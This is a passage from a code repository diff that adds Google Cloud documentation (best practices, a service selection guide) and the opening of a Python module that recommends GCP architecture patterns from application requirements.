| Data Pipeline | Unlimited (Dataflow) | Seconds |
| Multi-Region | Regional limits | Seconds |
### Operational Complexity
| Pattern | Setup | Maintenance | Debugging |
|---------|-------|-------------|-----------|
| Serverless Web | Low | Low | Medium |
| GKE Microservices | Medium | Medium | Medium |
| Three-Tier | Medium | Medium | Low |
| Data Pipeline | High | Medium | High |
| ML Platform | High | High | High |
| Multi-Region | High | High | High |

View File

@@ -0,0 +1,467 @@
# GCP Best Practices
Production-ready practices for naming, labels, IAM, networking, monitoring, and disaster recovery.
---
## Table of Contents
- [Naming Conventions](#naming-conventions)
- [Labels and Organization](#labels-and-organization)
- [IAM and Security](#iam-and-security)
- [Networking](#networking)
- [Monitoring and Logging](#monitoring-and-logging)
- [Cost Optimization](#cost-optimization)
- [Disaster Recovery](#disaster-recovery)
- [Common Pitfalls](#common-pitfalls)
---
## Naming Conventions
### Resource Naming Pattern
```
{environment}-{project}-{resource-type}-{purpose}
Examples:
prod-myapp-gke-cluster
dev-myapp-sql-primary
staging-myapp-run-api
prod-myapp-gcs-uploads
```
### Project Naming
```
{org}-{team}-{environment}
Examples:
acme-platform-prod
acme-platform-dev
acme-data-prod
```
### Naming Rules
| Resource | Format | Max Length | Example |
|----------|--------|-----------|---------|
| Project ID | lowercase, hyphens | 30 chars | acme-platform-prod |
| GKE Cluster | lowercase, hyphens | 40 chars | prod-api-cluster |
| Cloud Run | lowercase, hyphens | 49 chars | prod-myapp-api |
| Cloud SQL | lowercase, hyphens | 84 chars | prod-myapp-sql-primary |
| GCS Bucket | lowercase, hyphens, dots | 63 chars | acme-prod-myapp-uploads |
| Service Account | lowercase, hyphens | 30 chars | myapp-run-sa |
---
## Labels and Organization
### Required Labels
Apply these labels to all resources:
```
labels:
environment: "prod" # dev, staging, prod
team: "platform" # team owning the resource
app: "myapp" # application name
cost-center: "eng-001" # billing allocation
managed-by: "terraform" # terraform, gcloud, console
```
### Label-Based Cost Reporting
```bash
# Export billing data to BigQuery with labels
# Then query by label:
SELECT
labels.value AS environment,
SUM(cost) AS total_cost
FROM `billing_export.gcp_billing_export_v1_*`
CROSS JOIN UNNEST(labels) AS labels
WHERE labels.key = 'environment'
GROUP BY environment
ORDER BY total_cost DESC
```
### Organization Hierarchy
```
Organization
├── Folder: Production
│ ├── Project: platform-prod
│ ├── Project: data-prod
│ └── Project: ml-prod
├── Folder: Non-Production
│ ├── Project: platform-dev
│ ├── Project: platform-staging
│ └── Project: data-dev
└── Folder: Shared Services
├── Project: shared-networking
├── Project: shared-security
└── Project: shared-monitoring
```
---
## IAM and Security
### Principle of Least Privilege
```bash
# BAD: Basic roles are too broad
gcloud projects add-iam-policy-binding my-project \
--member="user:dev@example.com" \
--role="roles/editor"
# GOOD: Use predefined roles
gcloud projects add-iam-policy-binding my-project \
--member="user:dev@example.com" \
--role="roles/run.developer"
```
### Service Account Best Practices
```bash
# 1. Create dedicated SA per workload
gcloud iam service-accounts create myapp-api-sa \
--display-name="MyApp API Service Account"
# 2. Grant only required roles
gcloud projects add-iam-policy-binding my-project \
--member="serviceAccount:myapp-api-sa@my-project.iam.gserviceaccount.com" \
--role="roles/datastore.user"
# 3. Use Workload Identity for GKE (no key files)
gcloud iam service-accounts add-iam-policy-binding \
myapp-api-sa@my-project.iam.gserviceaccount.com \
--role="roles/iam.workloadIdentityUser" \
--member="serviceAccount:my-project.svc.id.goog[default/myapp-api-ksa]"
# 4. NEVER download SA key files in production
# Instead, use attached service accounts or impersonation
```
### VPC Service Controls
```bash
# Create a service perimeter to restrict data exfiltration
gcloud access-context-manager perimeters create my-perimeter \
--title="Production Data Perimeter" \
--resources="projects/123456" \
--restricted-services="bigquery.googleapis.com,storage.googleapis.com" \
--policy=$POLICY_ID
```
### Organization Policies
```bash
# Restrict external IPs on VMs
gcloud resource-manager org-policies set-policy \
--project=my-project policy.yaml
# policy.yaml
constraint: compute.vmExternalIpAccess
listPolicy:
allValues: DENY
# Restrict public Cloud Storage
constraint: storage.publicAccessPrevention
booleanPolicy:
enforced: true
```
### Encryption
| Layer | Service | Default |
|-------|---------|---------|
| At rest | Google-managed keys | Always enabled |
| At rest | CMEK (Cloud KMS) | Optional, recommended |
| In transit | TLS 1.3 | Always enabled |
| Application | Cloud KMS | Encrypt sensitive fields |
```bash
# Create CMEK key for Cloud SQL
gcloud kms keys create myapp-sql-key \
--keyring=myapp-keyring \
--location=us-central1 \
--purpose=encryption
# Use CMEK with Cloud SQL
gcloud sql instances create myapp-db \
--disk-encryption-key=projects/my-project/locations/us-central1/keyRings/myapp-keyring/cryptoKeys/myapp-sql-key
```
---
## Networking
### VPC Design
```bash
# Create custom VPC (avoid default network)
gcloud compute networks create myapp-vpc \
--subnet-mode=custom
# Create subnets with secondary ranges for GKE
gcloud compute networks subnets create myapp-subnet \
--network=myapp-vpc \
--region=us-central1 \
--range=10.0.0.0/20 \
--secondary-range pods=10.4.0.0/14,services=10.8.0.0/20 \
--enable-private-google-access
```
### Shared VPC
Use Shared VPC for multi-project environments:
```
Host Project (shared-networking)
├── VPC: shared-vpc
│ ├── Subnet: prod-us-central1 → Service Project: platform-prod
│ ├── Subnet: prod-europe-west1 → Service Project: platform-prod
│ └── Subnet: dev-us-central1 → Service Project: platform-dev
```
### Firewall Rules
```bash
# Allow internal traffic
gcloud compute firewall-rules create allow-internal \
--network=myapp-vpc \
--allow=tcp,udp,icmp \
--source-ranges=10.0.0.0/8
# Allow health checks from Google load balancers
gcloud compute firewall-rules create allow-health-checks \
--network=myapp-vpc \
--allow=tcp:8080 \
--source-ranges=35.191.0.0/16,130.211.0.0/22 \
--target-tags=allow-health-check
# Deny all other ingress (implicit, but be explicit)
gcloud compute firewall-rules create deny-all-ingress \
--network=myapp-vpc \
--action=DENY \
--rules=all \
--direction=INGRESS \
--priority=65534
```
### Private Google Access
Always enable Private Google Access to reach GCP APIs without public IPs:
```bash
gcloud compute networks subnets update myapp-subnet \
--region=us-central1 \
--enable-private-google-access
```
---
## Monitoring and Logging
### Cloud Monitoring Setup
```bash
# Create uptime check
gcloud monitoring uptime create \
--display-name="API Health Check" \
--resource-type=cloud-run-revision \
--resource-labels="service_name=myapp-api,location=us-central1" \
--check-request-path="/health" \
--period=60s
# Create alerting policy
gcloud alpha monitoring policies create \
--display-name="High Error Rate" \
--condition-display-name="Cloud Run 5xx > 1%" \
--condition-filter='resource.type="cloud_run_revision" AND metric.type="run.googleapis.com/request_count" AND metric.labels.response_code_class="5xx"' \
--condition-threshold-value=1 \
--notification-channels="projects/my-project/notificationChannels/12345"
```
### Key Metrics to Monitor
| Service | Metric | Alert Threshold |
|---------|--------|-----------------|
| Cloud Run | request_latencies (p99) | >2s |
| Cloud Run | request_count (5xx) | >1% of total |
| Cloud SQL | cpu/utilization | >80% |
| Cloud SQL | disk/utilization | >85% |
| GKE | container/cpu/utilization | >80% |
| GKE | node/cpu/allocatable_utilization | >85% |
| Pub/Sub | subscription/oldest_unacked_message_age | >300s |
| BigQuery | query/execution_time | >60s |
### Log-Based Metrics
```bash
# Create a metric for application errors
gcloud logging metrics create app-errors \
--description="Application error count" \
--log-filter='resource.type="cloud_run_revision" AND severity>=ERROR'
# Create log sink to BigQuery for analysis
gcloud logging sinks create audit-logs-bq \
bigquery.googleapis.com/projects/my-project/datasets/audit_logs \
--log-filter='logName="projects/my-project/logs/cloudaudit.googleapis.com%2Factivity"'
```
### Log Exclusion (Cost Reduction)
```bash
# Exclude verbose debug logs to save on Cloud Logging costs
gcloud logging sinks create _Default \
--log-filter='NOT (severity="DEBUG" OR severity="DEFAULT")' \
--description="Exclude debug-level logs"
# Or create exclusion filters
gcloud logging exclusions create exclude-debug \
--log-filter='severity="DEBUG"' \
--description="Exclude debug logs to reduce costs"
```
---
## Cost Optimization
### Committed Use Discounts
| Term | Compute Discount | Memory Discount |
|------|-----------------|-----------------|
| 1 year | 37% | 37% |
| 3 years | 55% | 55% |
```bash
# Check recommendations
gcloud recommender recommendations list \
--project=my-project \
--location=us-central1 \
--recommender=google.compute.commitment.UsageCommitmentRecommender
```
### Sustained Use Discounts
Automatic discounts for resources running >25% of the month:
| Usage | Discount |
|-------|----------|
| 25-50% | 20% |
| 50-75% | 40% |
| 75-100% | 60% |
### BigQuery Cost Control
```sql
-- Use partitioning to limit data scanned
CREATE TABLE my_dataset.events
PARTITION BY DATE(timestamp)
CLUSTER BY event_type
AS SELECT * FROM raw_events;
-- Estimate query cost before running
-- Use --dry_run flag
bq query --dry_run --use_legacy_sql=false \
'SELECT * FROM my_dataset.events WHERE DATE(timestamp) = "2026-01-01"'
```
### Cloud Storage Optimization
```bash
# Enable Autoclass for automatic class management
gsutil mb -l us-central1 --autoclass gs://my-bucket/
# Set lifecycle policy
gsutil lifecycle set lifecycle.json gs://my-bucket/
```
---
## Disaster Recovery
### RPO/RTO Targets
| Tier | RPO | RTO | Strategy |
|------|-----|-----|----------|
| Tier 1 (Critical) | 0 | <1 hour | Multi-region active-active |
| Tier 2 (Important) | <1 hour | <4 hours | Regional HA + cross-region backup |
| Tier 3 (Standard) | <24 hours | <24 hours | Automated backups + restore |
### Backup Strategy
```bash
# Cloud SQL automated backups
gcloud sql instances patch myapp-db \
--backup-start-time=02:00 \
--enable-point-in-time-recovery
# Firestore scheduled exports
gcloud firestore export gs://myapp-backups/firestore/$(date +%Y%m%d)
# GKE cluster backup with Backup for GKE
gcloud beta container backup-restore backup-plans create myapp-plan \
--project=my-project \
--location=us-central1 \
--cluster=projects/my-project/locations/us-central1/clusters/myapp-cluster \
--all-namespaces \
--cron-schedule="0 2 * * *"
```
### Multi-Region Failover
```bash
# Cloud SQL cross-region replica for DR
gcloud sql instances create myapp-db-replica \
--master-instance-name=myapp-db \
--region=us-east1
# Promote replica during failover
gcloud sql instances promote-replica myapp-db-replica
```
---
## Common Pitfalls
### Technical Debt
| Pitfall | Solution |
|---------|----------|
| Using default VPC | Always create custom VPCs |
| Not enabling audit logs | Enable Cloud Audit Logs from day one |
| Single-region deployment | Plan for multi-zone at minimum |
| No IaC | Use Terraform from the start |
### Security Mistakes
| Mistake | Prevention |
|---------|------------|
| SA key files in code | Use Workload Identity, attached SAs |
| Public GCS buckets | Enable org policy for public access prevention |
| Basic roles (Owner/Editor) | Use predefined or custom roles |
| No encryption key management | Use CMEK for sensitive data |
| Default service account | Create dedicated SAs per workload |
### Performance Issues
| Issue | Solution |
|-------|----------|
| Cold starts on Cloud Run | Set min-instances=1 for latency-critical services |
| Slow BigQuery queries | Partition tables, use clustering, avoid SELECT * |
| GKE pod scheduling delays | Use PodDisruptionBudget, pre-provision with Autopilot |
| Firestore hotspots | Distribute writes across document IDs evenly |
### Cost Surprises
| Surprise | Prevention |
|----------|------------|
| Undeleted resources | Label everything, review weekly |
| Egress costs | Keep traffic in same region, use Private Google Access |
| Cloud NAT charges | Use Private Google Access for GCP service traffic |
| Log ingestion costs | Set exclusion filters for debug/verbose logs |
| BigQuery full scans | Always use partitioning and clustering |
| Idle GKE clusters | Delete dev clusters nightly, use Autopilot |

View File

@@ -0,0 +1,547 @@
# GCP Service Selection Guide
Quick reference for choosing the right GCP service based on requirements.
---
## Table of Contents
- [Compute Services](#compute-services)
- [Database Services](#database-services)
- [Storage Services](#storage-services)
- [Messaging and Events](#messaging-and-events)
- [API and Integration](#api-and-integration)
- [Networking](#networking)
- [Security and Identity](#security-and-identity)
---
## Compute Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| HTTP-triggered containers, auto-scaling | Cloud Run |
| Event-driven, short tasks (<9 min) | Cloud Functions (2nd gen) |
| Kubernetes workloads, microservices | GKE Autopilot |
| Custom VMs, GPU/TPU | Compute Engine |
| Batch processing, HPC | Batch |
| Kubernetes with full control | GKE Standard |
### Cloud Run
**Best for:** Containerized HTTP services, APIs, web backends
```
Limits:
- vCPU: 1-8 per instance
- Memory: 128 MiB - 32 GiB
- Request timeout: 3600 seconds
- Concurrency: 1-1000 per instance
- Min instances: 0 (scale-to-zero)
- Max instances: 1000
Pricing: Per vCPU-second + GiB-second (free tier: 2M requests/month)
```
**Use when:**
- Containerized apps with HTTP endpoints
- Variable/unpredictable traffic
- Want scale-to-zero capability
- No Kubernetes expertise needed
**Avoid when:**
- Non-HTTP workloads (use Cloud Functions or GKE)
- Need GPU/TPU (use Compute Engine or GKE)
- Require persistent local storage
### Cloud Functions (2nd gen)
**Best for:** Event-driven functions, lightweight triggers, webhooks
```
Limits:
- Execution: 9 minutes max (2nd gen), 9 minutes (1st gen)
- Memory: 128 MB - 32 GB
- Concurrency: Up to 1000 per instance (2nd gen)
- Runtimes: Node.js, Python, Go, Java, .NET, Ruby, PHP
Pricing: $0.40 per million invocations + compute time
```
**Use when:**
- Event-driven processing (Pub/Sub, Cloud Storage, Firestore)
- Lightweight API endpoints
- Scheduled tasks (Cloud Scheduler triggers)
- Minimal infrastructure management
**Avoid when:**
- Long-running processes (>9 min)
- Complex multi-container apps
- Need fine-grained scaling control
### GKE Autopilot
**Best for:** Kubernetes workloads with managed node provisioning
```
Limits:
- Pod resources: 0.25-112 vCPU, 0.5-896 GiB memory
- GPU support: NVIDIA T4, L4, A100, H100
- Management fee: $0.10/hour per cluster ($74.40/month)
Pricing: Per pod vCPU-hour + GiB-hour (no node management)
```
**Use when:**
- Team has Kubernetes expertise
- Need pod-level resource control
- Multi-container services
- GPU workloads
### Compute Engine
**Best for:** Custom configurations, specialized hardware
```
Machine Types:
- General: e2, n2, n2d, c3
- Compute: c2, c2d
- Memory: m1, m2, m3
- Accelerator: a2 (GPU), a3 (GPU)
- Storage: z3
Pricing Options:
- On-demand, Spot (60-91% discount), Committed Use (37-55% discount)
```
**Use when:**
- Need GPU/TPU
- Windows workloads
- Specific hardware requirements
- Lift-and-shift migrations
---
## Database Services
### Decision Matrix
| Data Type | Query Pattern | Scale | Recommended |
|-----------|--------------|-------|-------------|
| Key-value, document | Simple lookups, real-time | Any | Firestore |
| Wide-column | High-throughput reads/writes | >1TB | Cloud Bigtable |
| Relational | Complex joins, ACID | Variable | Cloud SQL |
| Relational, global | Strong consistency, global | Large | Cloud Spanner |
| Time-series | Time-based queries | Any | Bigtable or BigQuery |
| Analytics, warehouse | SQL analytics | Petabytes | BigQuery |
### Firestore
**Best for:** Document data, mobile/web apps, real-time sync
```
Limits:
- Document size: 1 MiB max
- Field depth: 20 nested levels
- Write rate: 10,000 writes/sec per database
- Indexes: Automatic single-field, manual composite
Pricing:
- Reads: $0.036 per 100K reads
- Writes: $0.108 per 100K writes
- Storage: $0.108 per GiB/month
- Free tier: 50K reads, 20K writes, 1 GiB storage per day
```
**Use when:**
- Mobile/web apps needing offline sync
- Real-time data updates
- Flexible schema
- Serverless architecture
**Avoid when:**
- Complex SQL queries with joins
- Heavy analytics workloads
- Data >1 MiB per document
### Cloud SQL
**Best for:** Relational data with familiar SQL
| Engine | Version | Max Storage | Max Connections |
|--------|---------|-------------|-----------------|
| PostgreSQL | 15 | 64 TB | Instance-dependent |
| MySQL | 8.0 | 64 TB | Instance-dependent |
| SQL Server | 2022 | 64 TB | Instance-dependent |
```
Pricing:
- Machine type + storage + networking
- HA: 2x cost (regional instance)
- Read replicas: Per-replica pricing
```
**Use when:**
- Relational data with complex queries
- Existing SQL expertise
- Need ACID transactions
- Migration from on-premises databases
### Cloud Spanner
**Best for:** Globally distributed relational data
```
Limits:
- Storage: Unlimited
- Nodes: 1-100+ per instance
- Consistency: Strong global consistency
Pricing:
- Regional: $0.90/node-hour (~$657/month per node)
- Multi-region: $2.70/node-hour (~$1,971/month per node)
- Storage: $0.30/GiB/month
```
**Use when:**
- Global applications needing strong consistency
- Relational data at massive scale
- 99.999% availability requirement
- Horizontal scaling with SQL
### BigQuery
**Best for:** Analytics, data warehouse, SQL on massive datasets
```
Limits:
- Query: 6-hour timeout
- Concurrent queries: 100 default
- Streaming inserts: 100K rows/sec per table
Pricing:
- On-demand: $6.25 per TB queried (first 1 TB free/month)
- Editions: Autoscale slots starting at $0.04/slot-hour
- Storage: $0.02/GiB (active), $0.01/GiB (long-term)
```
### Firestore vs Cloud SQL vs Spanner
| Factor | Firestore | Cloud SQL | Cloud Spanner |
|--------|-----------|-----------|---------------|
| Query flexibility | Document-based | Full SQL | Full SQL |
| Scaling | Automatic | Vertical + read replicas | Horizontal |
| Consistency | Strong (single region) | ACID | Strong (global) |
| Cost model | Per-operation | Per-hour | Per-node-hour |
| Operational | Zero management | Managed (some ops) | Managed |
| Best for | Mobile/web apps | Traditional apps | Global scale |
---
## Storage Services
### Cloud Storage Classes
| Class | Access Pattern | Min Duration | Cost (GiB/mo) |
|-------|---------------|--------------|----------------|
| Standard | Frequent | None | $0.020 |
| Nearline | Monthly access | 30 days | $0.010 |
| Coldline | Quarterly access | 90 days | $0.004 |
| Archive | Annual access | 365 days | $0.0012 |
### Lifecycle Policy Example
```json
{
"lifecycle": {
"rule": [
{
"action": { "type": "SetStorageClass", "storageClass": "NEARLINE" },
"condition": { "age": 30, "matchesStorageClass": ["STANDARD"] }
},
{
"action": { "type": "SetStorageClass", "storageClass": "COLDLINE" },
"condition": { "age": 90, "matchesStorageClass": ["NEARLINE"] }
},
{
"action": { "type": "SetStorageClass", "storageClass": "ARCHIVE" },
"condition": { "age": 365, "matchesStorageClass": ["COLDLINE"] }
},
{
"action": { "type": "Delete" },
"condition": { "age": 2555 }
}
]
}
}
```
### Autoclass
Automatically transitions objects between storage classes based on access patterns. Recommended for mixed or unknown access patterns.
```bash
gsutil mb -l us-central1 --autoclass gs://my-bucket/
```
### Block and File Storage
| Service | Use Case | Access |
|---------|----------|--------|
| Persistent Disk | GCE/GKE block storage | Single instance (RW) or multi (RO) |
| Filestore | NFS shared file system | Multiple instances |
| Parallelstore | HPC parallel file system | High throughput |
| Cloud Storage FUSE | Mount GCS as filesystem | Any compute |
---
## Messaging and Events
### Decision Matrix
| Pattern | Service | Use Case |
|---------|---------|----------|
| Pub/sub messaging | Pub/Sub | Event streaming, microservice decoupling |
| Task queue | Cloud Tasks | Asynchronous task execution with retries |
| Workflow orchestration | Workflows | Multi-step service orchestration |
| Batch orchestration | Cloud Composer | Complex DAG-based pipelines (Airflow) |
| Event triggers | Eventarc | Route events to Cloud Run, GKE, Workflows |
### Pub/Sub
**Best for:** Event-driven architectures, stream processing
```
Limits:
- Message size: 10 MB max
- Throughput: Unlimited (auto-scaling)
- Retention: 7 days default (up to 31 days)
- Ordering: Per ordering key
Pricing: $40/TiB for message delivery
```
```python
# Pub/Sub publisher example
from google.cloud import pubsub_v1
import json
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path('my-project', 'events')
def publish_event(event_type, payload):
data = json.dumps(payload).encode('utf-8')
future = publisher.publish(
topic_path,
data,
event_type=event_type
)
return future.result()
```
### Cloud Tasks
**Best for:** Asynchronous task execution with delivery guarantees
```
Features:
- Configurable retry policies
- Rate limiting
- Scheduled delivery
- HTTP and App Engine targets
Pricing: $0.40 per million operations
```
### Eventarc
**Best for:** Routing cloud events to services
```python
# Eventarc routes events from 130+ Google Cloud sources
# to Cloud Run, GKE, or Workflows
# Example: Trigger Cloud Run on Cloud Storage upload
# gcloud eventarc triggers create my-trigger \
# --destination-run-service=my-service \
# --event-filters="type=google.cloud.storage.object.v1.finalized" \
# --event-filters="bucket=my-bucket"
```
---
## API and Integration
### API Gateway vs Cloud Endpoints vs Cloud Run
| Factor | API Gateway | Cloud Endpoints | Cloud Run (direct) |
|--------|-------------|-----------------|---------------------|
| Protocol | REST, gRPC | REST, gRPC | Any HTTP |
| Auth | API keys, JWT, Firebase | API keys, JWT | IAM, custom |
| Rate limiting | Built-in | Built-in | Manual |
| Cost | Per-call pricing | Per-call pricing | Per-request |
| Best for | External APIs | Internal APIs | Simple services |
### Cloud Endpoints Configuration
```yaml
# openapi.yaml
swagger: "2.0"
info:
title: "My API"
version: "1.0.0"
host: "my-api-xyz.apigateway.my-project.cloud.goog"
schemes:
- "https"
paths:
/users:
get:
summary: "List users"
operationId: "listUsers"
x-google-backend:
address: "https://my-app-api-xyz.a.run.app"
security:
- api_key: []
securityDefinitions:
api_key:
type: "apiKey"
name: "key"
in: "query"
```
### Workflows
**Best for:** Orchestrating multi-service processes
```yaml
# workflow.yaml
main:
steps:
- processOrder:
call: http.post
args:
url: https://orders-service.run.app/process
body:
orderId: ${args.orderId}
result: orderResult
- checkInventory:
switch:
- condition: ${orderResult.body.inStock}
next: shipOrder
next: backOrder
- shipOrder:
call: http.post
args:
url: https://shipping-service.run.app/ship
body:
orderId: ${args.orderId}
result: shipResult
- backOrder:
call: http.post
args:
url: https://inventory-service.run.app/backorder
body:
orderId: ${args.orderId}
```
---
## Networking
### VPC Components
| Component | Purpose |
|-----------|---------|
| VPC | Isolated network (global resource) |
| Subnet | Regional network segment |
| Cloud NAT | Outbound internet for private instances |
| Cloud Router | Dynamic routing (BGP) |
| Private Google Access | Access GCP APIs without public IP |
| VPC Peering | Connect two VPC networks |
| Shared VPC | Share VPC across projects |
### VPC Design Pattern
```
VPC: 10.0.0.0/16 (global)
Subnet us-central1:
10.0.0.0/20 (primary)
10.4.0.0/14 (pods - secondary)
10.8.0.0/20 (services - secondary)
- GKE cluster, Cloud Run (VPC connector)
Subnet us-east1:
10.0.16.0/20 (primary)
- Cloud SQL (private IP), Memorystore
Subnet europe-west1:
10.0.32.0/20 (primary)
- DR / multi-region workloads
```
### Private Google Access
```bash
# Enable Private Google Access on a subnet
gcloud compute networks subnets update my-subnet \
--region=us-central1 \
--enable-private-google-access
```
---
## Security and Identity
### IAM Best Practices
```bash
# Prefer predefined roles over basic roles
# BAD: roles/editor (too broad)
# GOOD: roles/run.invoker (specific)
# Grant role to service account
gcloud projects add-iam-policy-binding my-project \
--member="serviceAccount:my-sa@my-project.iam.gserviceaccount.com" \
--role="roles/datastore.user" \
--condition='expression=resource.name.startsWith("projects/my-project/databases/(default)/documents/users"),title=firestore-users-only'
```
### Service Account Best Practices
| Practice | Description |
|----------|-------------|
| One SA per service | Separate service accounts per workload |
| Workload Identity | Bind K8s SAs to GCP SAs in GKE |
| Short-lived tokens | Use impersonation instead of key files |
| No SA keys | Avoid downloading JSON key files |
### Secret Manager vs Environment Variables
| Factor | Secret Manager | Env Variables |
|--------|---------------|---------------|
| Rotation | Automatic versioning | Manual redeploy |
| Audit | Cloud Audit Logs | No audit trail |
| Access control | IAM per-secret | Per-service |
| Pricing | $0.06/10K access ops | Free |
| Use case | Credentials, API keys | Non-sensitive config |
### Secret Manager Usage
```python
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
# Usage
db_password = get_secret("my-project", "db-password")
```

View File

@@ -0,0 +1,805 @@
"""
GCP architecture design and service recommendation module.
Generates architecture patterns based on application requirements.
"""
import argparse
import json
import sys
from typing import Dict, List, Any
from enum import Enum
class ApplicationType(Enum):
"""Types of applications supported."""
WEB_APP = "web_application"
MOBILE_BACKEND = "mobile_backend"
DATA_PIPELINE = "data_pipeline"
MICROSERVICES = "microservices"
SAAS_PLATFORM = "saas_platform"
ML_PLATFORM = "ml_platform"
class ArchitectureDesigner:
"""Design GCP architectures based on requirements."""
def __init__(self, requirements: Dict[str, Any]):
"""
Initialize with application requirements.
Args:
requirements: Dictionary containing app type, traffic, budget, etc.
"""
self.app_type = requirements.get('application_type', 'web_application')
self.expected_users = requirements.get('expected_users', 1000)
self.requests_per_second = requirements.get('requests_per_second', 10)
self.budget_monthly = requirements.get('budget_monthly_usd', 500)
self.team_size = requirements.get('team_size', 3)
self.gcp_experience = requirements.get('gcp_experience', 'beginner')
self.compliance_needs = requirements.get('compliance', [])
self.data_size_gb = requirements.get('data_size_gb', 10)
def recommend_architecture_pattern(self) -> Dict[str, Any]:
"""
Recommend architecture pattern based on requirements.
Returns:
Dictionary with recommended pattern and services
"""
if self.app_type in ['web_application', 'saas_platform']:
if self.expected_users < 10000:
return self._serverless_web_architecture()
elif self.expected_users < 100000:
return self._gke_microservices_architecture()
else:
return self._multi_region_architecture()
elif self.app_type == 'mobile_backend':
return self._serverless_mobile_backend()
elif self.app_type == 'data_pipeline':
return self._data_pipeline_architecture()
elif self.app_type == 'microservices':
return self._gke_microservices_architecture()
elif self.app_type == 'ml_platform':
return self._ml_platform_architecture()
else:
return self._serverless_web_architecture()
def _serverless_web_architecture(self) -> Dict[str, Any]:
"""Serverless web application pattern using Cloud Run."""
return {
'pattern_name': 'Serverless Web Application',
'description': 'Fully serverless architecture with Cloud Run and Firestore',
'use_case': 'SaaS platforms, low to medium traffic websites, MVPs',
'services': {
'frontend': {
'service': 'Cloud Storage + Cloud CDN',
'purpose': 'Static website hosting with global CDN',
'configuration': {
'bucket': 'Website bucket with public access',
'cdn': 'Cloud CDN with custom domain and HTTPS',
'caching': 'Cache-Control headers, edge caching'
}
},
'api': {
'service': 'Cloud Run',
'purpose': 'Containerized API backend with auto-scaling',
'configuration': {
'cpu': '1 vCPU',
'memory': '512 Mi',
'min_instances': '0 (scale to zero)',
'max_instances': '10',
'concurrency': '80 requests per instance',
'timeout': '300 seconds'
}
},
'database': {
'service': 'Firestore',
'purpose': 'NoSQL document database with real-time sync',
'configuration': {
'mode': 'Native mode',
'location': 'Regional or multi-region',
'security_rules': 'Firestore security rules',
'backup': 'Scheduled exports to Cloud Storage'
}
},
'authentication': {
'service': 'Identity Platform',
'purpose': 'User authentication and authorization',
'configuration': {
'providers': 'Email/password, Google, Apple, OIDC',
'mfa': 'SMS or TOTP multi-factor authentication',
'token_expiration': '1 hour access, 30 days refresh'
}
},
'cicd': {
'service': 'Cloud Build',
'purpose': 'Automated build and deployment from Git',
'configuration': {
'source': 'GitHub or Cloud Source Repositories',
'build': 'Automatic on commit',
'environments': 'dev, staging, production'
}
}
},
'estimated_cost': {
'monthly_usd': self._calculate_serverless_cost(),
'breakdown': {
'Cloud CDN': '5-20 USD',
'Cloud Run': '5-25 USD',
'Firestore': '5-30 USD',
'Identity Platform': '0-10 USD (free tier: 50k MAU)',
'Cloud Storage': '1-5 USD'
}
},
'pros': [
'No server management',
'Auto-scaling with scale-to-zero',
'Pay only for what you use',
'No cold starts with min instances',
'Container-based (no runtime restrictions)'
],
'cons': [
'Vendor lock-in to GCP',
'Regional availability considerations',
'Debugging distributed systems complex',
'Firestore query limitations vs SQL'
],
'scaling_characteristics': {
'users_supported': '1k - 100k',
'requests_per_second': '100 - 10,000',
'scaling_method': 'Automatic (Cloud Run auto-scaling)'
}
}
def _gke_microservices_architecture(self) -> Dict[str, Any]:
"""GKE-based microservices architecture."""
return {
'pattern_name': 'Microservices on GKE',
'description': 'Kubernetes-native architecture with managed services',
'use_case': 'SaaS platforms, complex microservices, enterprise applications',
'services': {
'load_balancer': {
'service': 'Cloud Load Balancing',
'purpose': 'Global HTTP(S) load balancing',
'configuration': {
'type': 'External Application Load Balancer',
'ssl': 'Google-managed SSL certificate',
'health_checks': '/health endpoint, 10s interval',
'cdn': 'Cloud CDN enabled for static content'
}
},
'compute': {
'service': 'GKE Autopilot',
'purpose': 'Managed Kubernetes for containerized workloads',
'configuration': {
'mode': 'Autopilot (fully managed node provisioning)',
'scaling': 'Horizontal Pod Autoscaler',
'networking': 'VPC-native with Alias IPs',
'workload_identity': 'Enabled for secure service account binding'
}
},
'database': {
'service': 'Cloud SQL (PostgreSQL)',
'purpose': 'Managed relational database',
'configuration': {
'tier': 'db-custom-2-8192 (2 vCPU, 8 GB RAM)',
'high_availability': 'Regional with automatic failover',
'read_replicas': '1-2 for read scaling',
'backup': 'Automated daily backups, 7-day retention',
'encryption': 'Customer-managed encryption key (CMEK)'
}
},
'cache': {
'service': 'Memorystore (Redis)',
'purpose': 'Session storage, application caching',
'configuration': {
'tier': 'Basic (1 GB) or Standard (HA)',
'version': 'Redis 7.0',
'eviction_policy': 'allkeys-lru'
}
},
'messaging': {
'service': 'Pub/Sub',
'purpose': 'Asynchronous messaging between services',
'configuration': {
'topics': 'Per-domain event topics',
'subscriptions': 'Pull or push delivery',
'dead_letter': 'Dead letter topic after 5 retries',
'ordering': 'Ordering keys for ordered delivery'
}
},
'storage': {
'service': 'Cloud Storage',
'purpose': 'User uploads, backups, logs',
'configuration': {
'storage_class': 'Standard with lifecycle policies',
'versioning': 'Enabled for important buckets',
'lifecycle': 'Transition to Nearline after 30 days'
}
}
},
'estimated_cost': {
'monthly_usd': self._calculate_gke_cost(),
'breakdown': {
'Cloud Load Balancing': '20-40 USD',
'GKE Autopilot': '75-250 USD',
'Cloud SQL': '80-250 USD',
'Memorystore': '30-80 USD',
'Pub/Sub': '5-20 USD',
'Cloud Storage': '5-20 USD'
}
},
'pros': [
'Kubernetes ecosystem compatibility',
'Fine-grained scaling control',
'Multi-cloud portability',
'Rich service mesh (Anthos Service Mesh)',
'Managed node provisioning with Autopilot'
],
'cons': [
'Higher baseline costs than serverless',
'Kubernetes learning curve',
'More operational complexity',
'GKE management fee ($74.40/month per cluster)'
],
'scaling_characteristics': {
'users_supported': '10k - 500k',
'requests_per_second': '1,000 - 50,000',
'scaling_method': 'HPA + Cluster Autoscaler'
}
}
def _serverless_mobile_backend(self) -> Dict[str, Any]:
"""Serverless mobile backend with Firebase."""
return {
'pattern_name': 'Serverless Mobile Backend',
'description': 'Mobile-first backend with Firebase and Cloud Functions',
'use_case': 'Mobile apps, real-time applications, offline-first apps',
'services': {
'api': {
'service': 'Cloud Functions (2nd gen)',
'purpose': 'Event-driven API handlers',
'configuration': {
'runtime': 'Node.js 20 or Python 3.12',
'memory': '256 MB - 1 GB',
'timeout': '60 seconds',
